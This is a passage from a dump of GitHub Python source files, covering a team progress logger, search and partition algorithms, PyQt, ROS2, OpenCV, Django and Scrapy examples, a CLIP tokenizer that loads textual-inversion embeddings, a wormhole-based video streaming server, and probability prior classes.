status.__eq__(Status.NotStarted)\n\n\n# Gather progress data for each team member then convert to a message string\nclass DataCollector: \n def __init__(self) -> None:\n self.all_data = {\n TeamMembers.Simon: ProgressData(),\n TeamMembers.Andreas: ProgressData(),\n TeamMembers.Tom: ProgressData(),\n TeamMembers.Jesse: ProgressData()\n }\n\n\n # Add dialog data that is in progress, waiting for PR, or finished that day\n def _add_dialog_data(self, row) -> None:\n team_member_col = 1\n status_col = 2\n date_col = 3\n\n if ((not _check_member(row[team_member_col])) or \n ( _check_finished(row[status_col]) and not _check_date(row[date_col])) or \n (_check_not_started(row[status_col]))):\n return\n\n member_data = self.all_data[row[1]]\n progress_list = member_data.data[row[2]]\n progress_list.append(row[0])\n\n\n # Add server data that is in progress, waiting for PR, or finished that day\n def _add_server_data(self, row) -> None:\n task_name_col = 1\n server_team_member_col = 5\n server_status_col = 6\n server_date_col = 7\n client_team_member_col = 9\n client_status_col = 10\n client_date_col = 11\n\n is_invalid_server = (not _check_member(row[server_team_member_col]) or \n 
(_check_finished(row[server_status_col]) and not _check_date(row[server_date_col])) or \n                            (_check_not_started(row[server_status_col])))\n        \n        is_invalid_client = (not _check_member(row[client_team_member_col]) or\n                            (_check_finished(row[client_status_col]) and not _check_date(row[client_date_col])) or\n                            (_check_not_started(row[client_status_col])))\n\n        if not is_invalid_server:\n            member_data = self.all_data[row[server_team_member_col]]\n            progress_list = member_data.data[row[server_status_col]]\n            progress_list.append(f\"[Server] {row[task_name_col]}\")\n\n        if not is_invalid_client:\n            member_data = self.all_data[row[client_team_member_col]]\n            progress_list = member_data.data[row[client_status_col]]\n            progress_list.append(f\"[Client] {row[task_name_col]}\")\n\n\n    # Add dialog data\n    def add_dialog_data(self, data) -> None:\n        for d in data:\n            self._add_dialog_data(d)\n\n    \n    # Add server data\n    def add_server_data(self, data) -> None:\n        for d in data:\n            self._add_server_data(d)\n\n\n    def to_string(self) -> str:\n        res = f\"*{_get_today()} progress report:*\\n\\n\\n\"\n        for key, value in self.all_data.items():\n            res += f\"{key}\\n\\n\"\n            for embedKey, embedValue in value.data.items():\n                if len(embedValue) == 0:\n                    continue\n                res += \"```\"\n                res += f\"{embedKey}\\n\"\n                for task in embedValue:\n                    res += f\"{Constants.INDENT}{task}\\n\"\n                res += \"```\"\n                res += \"\\n\"\n            res += \"\\n\\n\" \n        return res\n    ","repo_name":"JesseLeung97/steins-progress-logger","sub_path":"google_sheets_reader/src/assembler.py","file_name":"assembler.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27782240579","text":"#116.\n\ndef partition(nums):\n    all_sum = sum(nums)\n\n\n    if all_sum % 2 != 0:\n        return False\n\n    half = all_sum // 2\n    # len(nums) + 1 independent rows; the original `[[False] * (half+1)] * len(nums)+1` was a\n    # precedence bug (TypeError) and would also have aliased every row to the same list\n    table = [[False] * (half + 1) for _ in range(len(nums) + 1)]\n\n    for i in range(len(nums), -1, -1): # iterate rows bottom-up, i decreasing\n        for s in range(half + 1): #iterate increasing\n            # sum is 0\n            #first column\n            if s == 0:\n                table[i][0] = True\n                continue\n\n            #bottom row (i is length of nums)\n            if i == len(nums):\n                table[i][s] = False\n                continue\n\n            #current sum is >= num at i\n            if s >= nums[i]:\n                table[i][s] = table[i+1][s-nums[i]]\n\n            #exclude/include\n            table[i][s] = table[i][s] or table[i+1][s]\n\n    return table[0][half]\n","repo_name":"n-gibs/dsa","sub_path":"dp/class/partition_equal_subset.py","file_name":"partition_equal_subset.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8940950648","text":"def linear_search(arr, target):\n    for i, it in enumerate(arr):\n        if it == target:\n            return i\n    return -1  # not found\n\n\ndef binary_search(arr, target):\n    low = 0\n    high = len(arr) - 1  # empty array: high = -1, so the loop never runs\n    while low <= high:\n        midpoint = (low + high) // 2\n        if arr[midpoint] == target:\n            return midpoint\n        elif arr[midpoint] < target:\n            low = midpoint + 1\n        else:\n            high = midpoint - 1\n    return -1  # not found\n\n\n
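# quick check of the fixed search: binary_search([1, 3, 5, 7], 5) -> 2; binary_search([2, 4], 9) -> -1\n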
def binary_search_recursive(arr, target, low, high):\n    if low > high:\n        return -1  # not found\n    middle = (low + high) // 2\n    if arr[middle] == target:\n        return middle\n    elif arr[middle] < target:\n        # recurse on a strictly smaller half; reusing middle here never terminated\n        return binary_search_recursive(arr, target, middle + 1, high)\n    else:\n        return binary_search_recursive(arr, target, low, middle - 1)\n","repo_name":"heiligbasil/Sorting","sub_path":"src/searching/searching.py","file_name":"searching.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"74630556327","text":"#!/usr/bin/python\n#coding=utf8\n#filename=toolbar.py\n\n'''\nCreated on 2010/07/29\n\n@author: hooxin\n'''\nimport sys\nfrom PyQt4 import QtGui,QtCore\n\nclass MainWindow(QtGui.QMainWindow):\n\tdef __init__(self):\n\t\tQtGui.QMainWindow.__init__(self)\n\t\t\n\t\tself.resize(250,150)\n\t\tself.setWindowTitle('toolbar')\n\t\tself.exit = QtGui.QAction(QtGui.QIcon(u'/home/hooxin/Pic/术士.jpg'),'exit',self)\n\t\tself.exit.setShortcut('Ctrl+Q')\n\t\tself.connect(self.exit, QtCore.SIGNAL('triggered()'),QtCore.SLOT('close()'))\n\t\t\n\t\tself.toolbar = self.addToolBar('exit')\n\t\tself.toolbar.addAction(self.exit)\n\t\t\napp=QtGui.QApplication(sys.argv)\nmain=MainWindow()\nmain.show()\nsys.exit(app.exec_())","repo_name":"firefoxmmx2/pythontest","sub_path":"src/toolbar.py","file_name":"toolbar.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5491119904","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 16 18:03:41 2021\n\n@author: fabian\n\"\"\"\n\nimport rclpy\nfrom rclpy.node import Node\nfrom geometry_msgs.msg import Point \nfrom cv_bridge import CvBridge\nimport cv2\nimport numpy as np\n\nclass MinimalSubscriber(Node):\n\n    def __init__(self):\n        super().__init__('minimal_subscriber')\n        self.subscription = self.create_subscription(Point, 'XY', self.listener_callback, 10) ###### here\n        self.subscription\n        self.i = 0\n    \n    def listener_callback(self,msg):\n        self.i += 1\n        print(\"listener iteration: \", self.i)\n        self.get_logger().info('sub done. 
iteration: ')\n        print(\"x: {} \\ny: {}\".format(msg.x,msg.y))\n        self.get_logger().info(str(msg.x))\n        self.get_logger().info(str(msg.y))\n    \ndef main(args=None):\n\n    rclpy.init(args=args)\n    minimal_subscriber = MinimalSubscriber()\n    rclpy.spin(minimal_subscriber)\n    minimal_subscriber.destroy_node()\n    rclpy.shutdown()\n\n#def main(args=None):\n#    pic1 = (return_array(subfolder, \"c1.png\"))\n#    pic2 = (return_array(subfolder, \"c1.png\"))\n#    msg = BatchPic()\n#    create_batch(msg,pic1,pic2,1)\n##    msg.pic1 = pic1\n##    msg.pic2 = pic2\n##    msg.robotid = 1\n#    print(msg)\nif __name__ == '__main__':\n    main()\n","repo_name":"fabianraus83/human_following","sub_path":"human_following/XYCoordinateWithUSBCamera_Sub.py","file_name":"XYCoordinateWithUSBCamera_Sub.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38125511262","text":"import cv2 as cv\r\nimport numpy as np\r\n# 21. Hough Line Transform introduction\r\n\r\n\r\ndef line_detection(image):\r\n    gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\r\n    # first obtain the Canny edges\r\n    edges = cv.Canny(gray, 50, 150, apertureSize=3)\r\n    cv.imshow(\"edges_image\", edges)\r\n    lines = cv.HoughLines(edges, 1, np.pi/180, 250)\r\n    for line in lines:\r\n        print(type(lines))\r\n        rho, theta = line[0]\r\n        # convert the polar form (rho, theta) back to Cartesian endpoints\r\n        a = np.cos(theta)\r\n        b = np.sin(theta)\r\n        x0 = a * rho\r\n        y0 = b * rho\r\n        x1 = int(x0 + 1000 * (-b))\r\n        y1 = int(y0 + 1000 * (a))\r\n        x2 = int(x0 - 1000 * (-b))\r\n        y2 = int(y0 - 1000 * (a)) \r\n        cv.line(image, (x1, y1), (x2, y2),(0, 0, 255), 2)\r\n    cv.imshow(\"image-lines\", image)\r\n\r\n# the probabilistic variant grabs only the segments that are likely to be straight lines\r\ndef line_detect_possible_demo(image):\r\n    gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\r\n    edges = cv.Canny(gray, 50, 150, apertureSize=3)\r\n    lines = cv.HoughLinesP(edges, 1, np.pi/180, 100, minLineLength=50, maxLineGap=10)\r\n    for line in lines:\r\n        print(type(lines))\r\n        x1, y1, x2, y2 = line[0]\r\n        cv.line(image, (x1, y1), (x2, y2),(0, 0, 255), 2)\r\n    cv.imshow(\"line_detect_possible_demo\", image)\r\n\r\nprint(\"-------hello python--------\")\r\nsrc = cv.imread(\"F:/021.jpg\") \r\ncv.namedWindow(\"input image\", cv.WINDOW_AUTOSIZE)\r\ncv.imshow(\"image\", src)\r\n \r\n# line_detection(src)\r\nline_detect_possible_demo(src)\r\n\r\ncv.waitKey(0)\r\n\r\ncv.destroyAllWindows()","repo_name":"HJHJKOKO/learning_to_OpenCV","sub_path":"21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23280767719","text":"\n\n\nimport random\nimport torch\nfrom transformers import CLIPTokenizer\n\n\n\n\n\nclass CLIPTokenizerWithEmbeddings(CLIPTokenizer):\n    '''can read embeddings in automatic1111 format or from torch.save({placeholder_token : embedding})'''\n    \n    def replace_placeholder_tokens_in_text(self, text, vector_shuffle=False):\n        if hasattr(self, 'token2all_tokens'):\n            for token, all_tokens in self.token2all_tokens.items():\n                if vector_shuffle:\n                    all_tokens = all_tokens[:]\n                    random.shuffle(all_tokens)\n\n                if isinstance(text, list):\n                    text = [t.replace(token, \" \".join(all_tokens)) for t in text]\n                else:\n                    text = text.replace(token, \" \".join(all_tokens))\n        \n        return text\n    \n\n    def __call__(self, text, *args, vector_shuffle=False, **kwargs):\n        return super().__call__(self.replace_placeholder_tokens_in_text(text, vector_shuffle=vector_shuffle), *args, **kwargs)\n\n\n    def encode(self, text, *args, vector_shuffle=False, **kwargs):\n        return 
super().encode(self.replace_placeholder_tokens_in_text(text, vector_shuffle=vector_shuffle), *args, **kwargs)\n\n\n\n def init_attributes(self):\n if not hasattr(self, 'token2id'):\n self.__setattr__('token2id', {})\n \n if not hasattr(self, 'token_id2all_token_ids'):\n self.__setattr__('token_id2all_token_ids', {})\n\n if not hasattr(self, 'token2all_tokens'):\n self.__setattr__('token2all_tokens', {})\n\n def load_embedding(self, token, path, text_encoder, use_orig_token=False):\n with torch.no_grad():\n\n self.init_attributes() \n \n x = torch.load(path)\n \n is_automatic1111_embedding = False\n \n if 'string_to_param' in x:\n is_automatic1111_embedding = True\n \n \n if is_automatic1111_embedding:\n # {\n # 'string_to_token' : {'*': 265},\n # 'string_to_param':tensor\n # ...\n # }\n \n # place_holder token will not be used in the embedding but will be replaced with the token argument\n placeholder_token = list(x['string_to_token'].keys())[0]\n embedding_matrix = x['string_to_param'][placeholder_token]\n \n else:\n placeholder_token = list(x.keys())[0]\n embedding_matrix = x[placeholder_token]\n \n if use_orig_token:\n token = placeholder_token\n\n print(text_encoder.get_input_embeddings().weight.data.dtype)\n \n n_vectors = embedding_matrix.shape[0]\n embedding_size = embedding_matrix.shape[1]\n \n tokens_to_add = [token] + [token+str(i) for i in range(n_vectors-1)]\n num_added_toks = self.add_tokens(tokens_to_add)\n \n text_encoder.resize_token_embeddings(self.__len__())\n \n token_id = self.convert_tokens_to_ids(token)\n token_ids = self.convert_tokens_to_ids(tokens_to_add)\n \n self.token2id[token] = token_id\n self.token_id2all_token_ids[token_id] = token_ids\n self.token2all_tokens[token] = tokens_to_add\n \n \n token_embeds = text_encoder.get_input_embeddings().weight.data\n \n token_embeds[token_id:token_id+n_vectors] = embedding_matrix\n \n\n\n def add_embedding(self, token, text_encoder, initializer_token=None, n_vectors=4, if_exists='error'):\n ''' \n adds new token to tokenizer with multiple embeddings \n @initializer_token: string, eg 'cat'\n @if_exists: one of ['error', 'append']\n '''\n\n self.init_attributes()\n\n\n with torch.no_grad():\n if token in self.token2all_tokens: # token already exists\n if if_exists=='error':\n raise ValueError(\n f\"The tokenizer already contains the token {token}. 
Please pass a different\"\n \" `placeholder_token` that is not already in the tokenizer.\"\n )\n \n existing_tokens = self.token2all_tokens[token] # eg ['', '0', '1', '2']\n tokens_to_add = [token+str(i+len(existing_tokens)-1) for i in range(n_vectors)]\n num_added_toks = self.add_tokens(tokens_to_add)\n\n self.token2all_tokens[token] += tokens_to_add\n\n\n else:\n\n tokens_to_add = [token] + [token+str(i) for i in range(n_vectors-1)]\n num_added_toks = self.add_tokens(tokens_to_add)\n\n self.token2all_tokens[token] = tokens_to_add\n\n\n text_encoder.resize_token_embeddings(self.__len__())\n\n token_ids = self.convert_tokens_to_ids(tokens_to_add)\n\n token_embeds = text_encoder.get_input_embeddings().weight.data\n\n if initializer_token:\n\n init_token_ids = self.encode(initializer_token, add_special_tokens=False)\n for i, id in enumerate(token_ids):\n token_embeds[id] = token_embeds[init_token_ids[i * len(init_token_ids)//n_vectors]]\n\n else:\n for id in token_ids:\n token_embeds[id] = torch.randn_like(token_embeds[id])\n\n\n\n def get_mask(self, accelerator):\n # Get the mask of the weights that won't change\n mask = torch.ones(self.__len__()).to(accelerator.device, dtype=torch.bool)\n\n for token in self.token2all_tokens.keys():\n token_ids = self.encode(token, add_special_tokens=False)\n for i in range(len(token_ids)):\n mask = mask & (torch.arange(self.__len__()) != token_ids[i]).to(accelerator.device)\n return mask\n\n\n\n\n\ndef save_progress(tokenizer, text_encoder, accelerator, save_path):\n if not hasattr(tokenizer, 'token2all_tokens'):\n print('no added tokens, no embeddings to save')\n return\n print('save added tokens: ', tokenizer.token2all_tokens.keys())\n learned_embeds_dict = {}\n for placeholder_token in tokenizer.token2all_tokens.keys():\n placeholder_token_ids = tokenizer.encode(placeholder_token, add_special_tokens=False)\n\n learned_embeds = accelerator.unwrap_model(text_encoder).get_input_embeddings().weight[placeholder_token_ids]\n print(f'embedding.shape of {placeholder_token}: ', learned_embeds.shape)\n\n if len(placeholder_token_ids) == 1:\n # add extra dimension\n learned_embeds = learned_embeds[None]\n learned_embeds_dict[placeholder_token] = learned_embeds.detach().cpu()\n torch.save(learned_embeds_dict, save_path)\n\n\n\n\n\n\n\nif __name__ == '__main__':\n\n from diffusers import StableDiffusionPipeline, DDIMScheduler, DPMSolverMultistepScheduler, LMSDiscreteScheduler, EulerDiscreteScheduler, DDPMScheduler, UNet2DConditionModel, AutoencoderKL\n from transformers import CLIPTextModel, CLIPTokenizer\n import urllib.request \n urllib.request.urlretrieve('https://huggingface.co/spaablauw/FloralMarble/resolve/main/FloralMarble-400.pt', './data/FloralMarble-400.pt')\n\n\n model_path = 'stabilityai/stable-diffusion-2-1'\n\n text_encoder = CLIPTextModel.from_pretrained(\n model_path,\n subfolder=\"text_encoder\",\n #revision=\"fp16\"\n )\n text_encoder.to(dtype=torch.float16)\n\n\n tokenizer = CLIPTokenizerWithEmbeddings.from_pretrained(model_path, subfolder=\"tokenizer\")\n\n\n tokenizer.load_embedding('', './data/FloralMarble-400.pt', text_encoder)\n\n # important: version 2.1 768 doesnt work with the scheduler: scheduler = DDIMScheduler(beta_start=0.00085, beta_end=0.012, beta_schedule=\"scaled_linear\", clip_sample=False, set_alpha_to_one=False)\n # the 2.1-base does\n pipe = StableDiffusionPipeline.from_pretrained(model_path, tokenizer=tokenizer, text_encoder=text_encoder, safety_checker=None, torch_dtype=torch.float16).to(\"cuda\")\n\n\n #pipe.scheduler = 
DPMSolverMultistepScheduler.from_config(pipe.scheduler.config)\n #pipe.scheduler = LMSDiscreteScheduler.from_config(pipe.scheduler.config)\n pipe.scheduler = EulerDiscreteScheduler.from_config(pipe.scheduler.config)\n #pipe.scheduler = DDIMScheduler.from_config(pipe.scheduler.config)\n\n print(pipe.scheduler.config.prediction_type) # should be 'v_prediction' for 768 version\n\n\n g_cuda = torch.Generator(device='cuda')\n seed = 1965858791\n g_cuda.manual_seed(seed)\n\n\n prompt = \"skulpture of greek warrior in helmet, , red colors, fire\"\n negative_prompt = \"\" \n\n num_samples = 1\n guidance_scale = 7\n num_inference_steps = 50\n height = 768 #768 # 512\n width = 768 #768 # 512\n\n\n # DONT use torch.autocast(\"cuda\") here to fix black blank images\n with torch.inference_mode():\n images = pipe(\n prompt,\n height=height,\n width=width,\n negative_prompt=negative_prompt,\n num_images_per_prompt=num_samples,\n num_inference_steps=num_inference_steps,\n guidance_scale=guidance_scale,\n generator=g_cuda\n ).images\n\n for i, img in enumerate(images):\n img.save(f'./data/{i}.png')","repo_name":"pkurzend/stable-diffusion-scripts","sub_path":"CLIPTokenizerWithEmbeddings.py","file_name":"CLIPTokenizerWithEmbeddings.py","file_ext":"py","file_size_in_byte":9415,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"19500586108","text":"import click\nimport struct\nimport subprocess\nfrom twisted.internet.defer import inlineCallbacks\nfrom twisted.internet.endpoints import serverFromString\nfrom twisted.internet.protocol import (\n ProcessProtocol,\n Protocol,\n ServerFactory,\n)\n\nfrom . import util\n\n\nclass CameraProtocol(ProcessProtocol):\n def __init__(self, sp):\n self.sp = sp\n\n def connectionMade(self):\n # So we can see what we are sending\n self.mpvp = subprocess.Popen('mpv -', stdin=subprocess.PIPE, shell=True)\n\n def outReceived(self, data):\n self.sp.transport.write(data)\n try:\n self.mpvp.stdin.write(data)\n except IOError:\n pass # Only our side failing\n\nclass SendProtocol(Protocol):\n def connectionMade(self):\n click.echo('recipient connected')\n cp = CameraProtocol(self)\n self.cpt = self.factory.reactor.spawnProcess(cp, 'ffmpeg', util.ffmpeg_args())\n\n def connectionLost(self, reason):\n click.echo('recipient disconnected')\n self.cpt.loseConnection()\n self.factory.client_disconnected()\n\nclass RecvProtocol(Protocol):\n def connectionMade(self):\n click.echo('sender connected')\n self.mpvp = subprocess.Popen('mpv -', stdin=subprocess.PIPE, shell=True)\n\n def dataReceived(self, data):\n try:\n self.mpvp.stdin.write(data)\n except IOError:\n self.transport.loseConnection()\n\n def connectionLost(self, reason):\n click.echo('sender disconnected')\n self.mpvp.terminate()\n\nclass SendFactory(ServerFactory):\n protocol = SendProtocol\n\n def __init__(self, reactor, *args):\n self.reactor = reactor\n self.args = args\n\n def client_disconnected(self):\n self.reactor.callLater(1, get_client, self.reactor, *self.args)\n\nclass RecvFactory(ServerFactory):\n protocol = RecvProtocol\n\n@inlineCallbacks\ndef run_server(reactor, addr, send_port, recv_port):\n sep = serverFromString(reactor, 'tcp:%d' % send_port)\n sep.listen(SendFactory(reactor, addr, send_port, recv_port))\n\n rep = serverFromString(reactor, 'tcp:%d' % recv_port)\n rep.listen(RecvFactory())\n\n yield get_client(reactor, addr, send_port, recv_port)\n\n@util.wormholeProto()\n@inlineCallbacks\ndef get_client(_, w, addr, send_port, recv_port):\n code = yield 
w.get_code()\n click.echo('Give this code to the client: %s' % code)\n yield w.get()\n yield w.send(addr.encode('UTF8'))\n yield w.send(struct.pack('>H', send_port))\n yield w.send(struct.pack('>H', recv_port))\n","repo_name":"alecmuffett/videonion","sub_path":"videonion/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"6817163474","text":"import time\nfrom datetime import datetime\n\nimport numpy as np\n\n\ndef apartment_into(features, apartment, model=None):\n for feature, value in zip(features, apartment):\n if feature == \"soldDate\":\n dt_object = datetime.fromtimestamp(value)\n print(feature + \": {:.2f}\".format(value) + \" (corresponds to date: \" + str(dt_object.date()) + \")\")\n else:\n print(feature + \": {:.2f}\".format(value))\n if model is not None:\n area_index = np.where(features == \"livingArea\")[0][0]\n area = apartment[area_index]\n t0 = time.time()\n price = model.predict(apartment)\n print(\"It took {:.1f} ms to predict the prize.\".format(1000 * (time.time() - t0)))\n print(\n \"Predicted apartment price at sold date is {:.1f} Msek. Corresponds to {:.1f} ksek/m2.\".format(\n price / 10**6, price / (area * 10**3)\n )\n )\n time_index = np.where(features == \"soldDate\")[0][0]\n apartment_current_time = apartment.copy()\n apartment_current_time[time_index] = datetime.now().timestamp()\n price = model.predict(apartment_current_time)\n print(\n \"Predicted apartment price now is {:.1f} Msek. Corresponds to {:.1f} ksek/m2.\\n\".format(\n price / 10**6, price / (area * 10**3)\n )\n )\n\n else:\n print(\"\")\n","repo_name":"JohanSchott/apartment_prices","sub_path":"apartment_prices/disp.py","file_name":"disp.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"3261645106","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\n\ndef home(request):\n return render(request,'index.html')\n\ndef analyze(request):\n # Get the text\n djtext = request.POST.get('text', 'default')\n removepunc=request.POST.get('removepunccc','off')\n capalize=request.POST.get('capson','off')\n countchar=request.POST.get('countch','off')\n vowelss=request.POST.get('vowelsss','off')\n# ------------------------------------------------------------------------\n if removepunc == \"on\":\n punctuations = '''!()-[]{};:'\"\\,<>./?@#$%^&*_~'''\n analyzed = \"\"\n for char in djtext:\n if char not in punctuations:\n analyzed = analyzed + char\n params = {'purpose': 'Removed Punctuations', 'analyzed_text': analyzed}\n djtext = analyzed\n # return render(request, 'analyzed.html', params)\n# ---------------------------------------------------------------------------------\n if(capalize==\"on\"):\n analyzed=\"\"\n for char in djtext:\n analyzed=analyzed+char.upper()\n params = {'purpose': 'Changed To UpperCase', 'analyzed_text': analyzed}\n djtext = analyzed\n # return render(request, 'analyzed.html', params)\n \n# ----------------------------------------------------------------------------------- \n if(countchar==\"on\"):\n analyzedd=0\n for char in djtext:\n analyzedd=len(djtext)\n params = {'purpose': 'Here is Your Total Character ', 'analyzed_text': analyzedd}\n \n # return render(request, 'analyzed.html', params)\n#-------------------------------------------------------------------------------------- \n if(vowelss==\"on\"):\n analyzed1=0\n for 
char in djtext:\n if(char=='a' or char=='e' or char=='i' or char=='o' or char=='u' or char=='A' or char=='E' or char=='I' or char=='O' or char=='U'):\n analyzed1=analyzed1+1\n params = {'purpose': 'Counting the vowels', 'analyzed_text': analyzed1}\n \n#--------------------------------------------------------------------------------------\n if(removepunc != \"on\" and capalize!=\"on\" and countchar!=\"on\" and vowelss!='on'):\n return HttpResponse('''Select Some Toggle Keys😋


Back''')\n if(countchar=='on' and vowelss=='on'):\n params = {'purpose': 'Counting the Charactrs & vowels','analyzed_text':analyzedd, 'analyzed_textt': analyzed1}\n if(removepunc=='on' and vowelss=='on'):\n params = {'purpose': 'Removed Punctuations and counted vowels','analyzed_text':analyzed, 'analyzed_textt': analyzed1}\n if(capalize=='on' and countchar=='on'):\n params = {'purpose': 'UpperCase and counted characters','analyzed_text':analyzed, 'analyzed_textt': analyzedd}\n if(capalize=='on' and vowelss=='on'):\n params = {'purpose': 'UpperCase and vowels ','analyzed_text':analyzed, 'analyzed_textt': analyzed1}\n if(capalize=='on' and vowelss=='on' and countchar=='on'):\n params = {'purpose': 'UpperCase && vowels && characters','analyzed_text':analyzed, 'analyzed_textt': analyzed1,'analyzed_texttt': analyzedd}\n \n return render(request, 'analyzed.html', params)\n ","repo_name":"MdRaashidit/TextUtility","sub_path":"mysite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19966542462","text":"# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\nfrom itemadapter import ItemAdapter\n\n# 添加必备包和加载设置\nimport pymongo\nfrom scrapy.utils.project import get_project_settings\n\nsettings = get_project_settings()\n\n\nclass NewsdataPipeline:\n # class中全部替换\n def __init__(self):\n host = settings[\"MONGODB_HOST\"]\n port = settings[\"MONGODB_PORT\"]\n dbname = settings[\"MONGODB_DATABASE\"]\n sheetname = settings[\"MONGODB_TABLE\"]\n #username = settings[\"MONGODB_USER\"]\n #password = settings[\"MONGODB_PASSWORD\"]\n # 创建MONGODB数据库链接\n #client = pymongo.MongoClient(host=host, port=port, username=username, password=password)\n client = pymongo.MongoClient(host=host, port=port)\n # 指定数据库\n mydb = client[dbname]\n # 存放数据的数据库表名\n self.post = mydb[sheetname]\n\n def process_item(self, item, spider):\n data = dict(item)\n # 数据写入\n self.post.insert_one(data)\n return item\n\n","repo_name":"Millastar/Spark-composition-website-Data-crawling","sub_path":"NewsData/NewsData/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14135779223","text":"\"\"\"A collection of modules for iterating through different kinds of\ntree, generating tokens identical to those produced by the tokenizer\nmodule.\n\nTo create a tree walker for a new type of tree, you need to do\nimplement a tree walker object (called TreeWalker by convention) that\nimplements a 'serialize' method taking a tree as sole argument and\nreturning an iterator generating tokens.\n\"\"\"\n\ntreeWalkerCache = {}\n\ndef getTreeWalker(treeType, implementation=None, **kwargs):\n \"\"\"Get a TreeWalker class for various types of tree with built-in support\n\n treeType - the name of the tree type required (case-insensitive). 
Supported\n values are \"simpletree\", \"dom\", \"etree\" and \"beautifulsoup\"\n\n \"simpletree\" - a built-in DOM-ish tree type with support for some\n more pythonic idioms.\n \"dom\" - The xml.dom.minidom DOM implementation\n \"pulldom\" - The xml.dom.pulldom event stream\n \"etree\" - A generic walker for tree implementations exposing an\n elementtree-like interface (known to work with\n ElementTree, cElementTree and lxml.etree).\n \"lxml\" - Optimized walker for lxml.etree\n \"beautifulsoup\" - Beautiful soup (if installed)\n \"genshi\" - a Genshi stream\n\n implementation - (Currently applies to the \"etree\" tree type only). A module\n implementing the tree type e.g. xml.etree.ElementTree or\n cElementTree.\"\"\"\n\n treeType = treeType.lower()\n if treeType not in treeWalkerCache:\n if treeType in (\"dom\", \"pulldom\", \"simpletree\"):\n mod = __import__(treeType, globals())\n treeWalkerCache[treeType] = mod.TreeWalker\n elif treeType == \"genshi\":\n import genshistream\n treeWalkerCache[treeType] = genshistream.TreeWalker\n elif treeType == \"beautifulsoup\":\n import soup\n treeWalkerCache[treeType] = soup.TreeWalker\n elif treeType == \"lxml\":\n import lxmletree\n treeWalkerCache[treeType] = lxmletree.TreeWalker\n elif treeType == \"etree\":\n import etree\n # XXX: NEVER cache here, caching is done in the etree submodule\n return etree.getETreeModule(implementation, **kwargs).TreeWalker\n return treeWalkerCache.get(treeType)\n","repo_name":"livid/v2ex-gae","sub_path":"html5lib/treewalkers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":3095,"dataset":"github-code","pt":"53"} +{"seq_id":"72040224487","text":"import torch.distributions as td\nimport torch\nimport math\nfrom gpytorch.utils.transforms import inv_softplus\n\nfrom .base import Prior\nfrom .loc_scale import Normal, Laplace, StudentT, GenNorm, ConvCorrelatedNormal\nfrom .transformed import Gamma, Uniform, HalfCauchy\n\n\n__all__ = ('NormalGamma', 'NormalUniform', 'Horseshoe', 'LaplaceGamma',\n 'LaplaceUniform', 'StudentTGamma', 'StudentTUniform',\n 'GenNormUniform', 'ConvCorrNormalGamma')\n\n\nclass NormalGamma(Normal):\n def __init__(self, shape, loc, scale, rate=1., gradient_clip=1.):\n scale_prior = Gamma(shape=[], concentration=scale, rate=rate)\n with torch.no_grad():\n scale_prior.p.data = inv_softplus(torch.tensor(scale))\n super().__init__(shape, loc, scale_prior)\n\n\nclass NormalUniform(Normal):\n def __init__(self, shape, loc, scale, gradient_clip=1.):\n scale_prior = Uniform(shape=[], low=0., high=scale*2.)\n with torch.no_grad():\n scale_prior.p.data = torch.tensor(0.)\n super().__init__(shape, loc, scale_prior)\n \n \nclass ConvCorrNormalGamma(ConvCorrelatedNormal):\n def __init__(self, shape, loc, scale, lengthscale=1., rate=1.):\n lengthscale_prior = Gamma(shape=[], concentration=lengthscale, rate=rate)\n scale_prior = Gamma(shape=[], concentration=scale, rate=rate)\n with torch.no_grad():\n lengthscale_prior.p.data = inv_softplus(torch.tensor(lengthscale))\n scale_prior.p.data = inv_softplus(torch.tensor(scale))\n super().__init__(shape, loc, scale=scale_prior, lengthscale=lengthscale_prior)\n\n \nclass LaplaceGamma(Laplace):\n def __init__(self, shape, loc, scale, rate=1., gradient_clip=1.):\n scale_prior = Gamma(shape=[], concentration=scale, rate=rate)\n with torch.no_grad():\n scale_prior.p.data = inv_softplus(torch.tensor(scale))\n super().__init__(shape, loc, scale_prior)\n\n \nclass 
